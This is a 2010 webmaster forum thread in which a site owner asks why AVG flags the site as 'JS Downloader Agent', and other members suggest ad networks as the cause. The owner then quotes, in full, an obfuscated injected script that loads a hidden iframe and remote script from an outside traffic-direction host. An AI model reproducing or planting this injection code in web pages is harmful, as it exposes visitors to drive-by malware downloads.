AVG showing threat in my site

Discussion in 'Site & Server Administration' started by Gursimran, Feb 6, 2010.

  1. #1
    Hello, My users who are using AVG antivirus are reporting that they are not able to access the website due to a threat

    AVG is showing JS Downloader Agent or something

    Is it due to popups I am showing (xtendmedia)

    What should I do?

    Do I need an OS reinstall or reuploading all files after cleaning.
     
    Gursimran, Feb 6, 2010 IP
  2. vagrant

    vagrant Peon

    Messages:
    2,284
    Likes Received:
    181
    Best Answers:
    0
    Trophy Points:
    0
    #2
    yes it is probably due to the ads. do a google search for xtendmedia trojan and you will see many results.

    if your AVG blocked it then just remove the ads from your site.
     
    vagrant, Feb 6, 2010 IP
  3. Gursimran

    Gursimran Well-Known Member

    Messages:
    1,385
    Likes Received:
    53
    Best Answers:
    0
    Trophy Points:
    160
    #3
    But... a lot of websites like mediafire are using xtendmedia ads... I never got any threat message for those websites
     
    Gursimran, Feb 6, 2010 IP
  4. hvalle98

    hvalle98 Well-Known Member

    Messages:
    460
    Likes Received:
    13
    Best Answers:
    0
    Trophy Points:
    135
    #4
    Let me check this out. What's your site? The one on your signature?
     
    hvalle98, Feb 6, 2010 IP
  5. Gursimran

    Gursimran Well-Known Member

    Messages:
    1,385
    Likes Received:
    53
    Best Answers:
    0
    Trophy Points:
    160
    #5
    I managed to find it.. I dont know how this code got entered in my website. I am bit worried.
    
    <script language=javascript>document.write(unescape('%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%6A%61%76%61%73%63%72%69%70%74%22%3E%66%75%6E%63%74%69%6F%6E%20%64%46%28%73%29%7B%76%61%72%20%73%31%3D%75%6E%65%73%63%61%70%65%28%73%2E%73%75%62%73%74%72%28%30%2C%73%2E%6C%65%6E%67%74%68%2D%31%29%29%3B%20%76%61%72%20%74%3D%27%27%3B%66%6F%72%28%69%3D%30%3B%69%3C%73%31%2E%6C%65%6E%67%74%68%3B%69%2B%2B%29%74%2B%3D%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%73%31%2E%63%68%61%72%43%6F%64%65%41%74%28%69%29%2D%73%2E%73%75%62%73%74%72%28%73%2E%6C%65%6E%67%74%68%2D%31%2C%31%29%29%3B%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%75%6E%65%73%63%61%70%65%28%74%29%29%3B%7D%3C%2F%73%63%72%69%70%74%3E'));dF('%264Dtdsjqu%264Fepdvnfou/xsjuf%2639%2633%264Dtdsjqu%2631tsd%264E%266D%2633%2633%2C%2633iuuq%264B00jutbmmcsfbltpgu/ofu0uet0jo/dhj%264G3%2637tfpsfg%264E%2633%2CfodpefVSJDpnqpofou%2639epdvnfou/sfgfssfs%263%3A%2C%2633%2637qbsbnfufs%264E%2635lfzxpse%2637tf%264E%2635tf%2637vs%264E2%2637IUUQ%60SFGFSFS%264E%2633%2C%2631fodpefVSJDpnqpofou%2639epdvnfou/VSM%263%3A%2C%2633%2637efgbvmu%60lfzxpse%264Eopuefgjof%2633%2C%2633%266D%2633%264F%264D%266D0tdsjqu%264F%2633%263%3A%264C%264D0tdsjqu%264F%261B%264Dtdsjqu%264F%261Bjg%2639uzqfpg%2639i%263%3A%264E%264E%2633voefgjofe%2633%263%3A%268C%261%3A%261B%261%3Aepdvnfou/xsjuf%2639%2633%264Djgsbnf%2631tsd%264E%2638iuuq%264B00jutbmmcsfbltpgu/ofu0uet0jo/dhj%264G4%2637tfpsfg%264E%2633%2CfodpefVSJDpnqpofou%2639epdvnfou/sfgfssfs%263%3A%2C%2633%2637qbsbnfufs%264E%2635lfzxpse%2637tf%264E%2635tf%2637vs%264E2%2637IUUQ%60SFGFSFS%264E%2633%2C%2631fodpefVSJDpnqpofou%2639epdvnfou/VSM%263%3A%2C%2633%2637efgbvmu%60lfzxpse%264Eopuefgjof%2638%2631xjeui%264E2%2631ifjhiu%264E2%2631cpsefs%264E1%2631gsbnfcpsefs%264E1%264F%264D0jgsbnf%264F%2633%263%3A%264C%2631%261B%268E%261Bfmtf%2631jg%2639i/joefyPg%2639%2633iuuq%264B%2633%263%3A%264E%264E1%263%3A%268C%261B%261%3A%261%3Axjoepx/mpdbujpo%264Ei%264C%261B%268E%261B%264D0tdsjqu%264F1')</script>
    
    Code (markup):
     
    Gursimran, Feb 7, 2010 IP
  6. vagrant

    vagrant Peon

    Messages:
    2,284
    Likes Received:
    181
    Best Answers:
    0
    Trophy Points:
    0
    #6
    vagrant, Feb 7, 2010 IP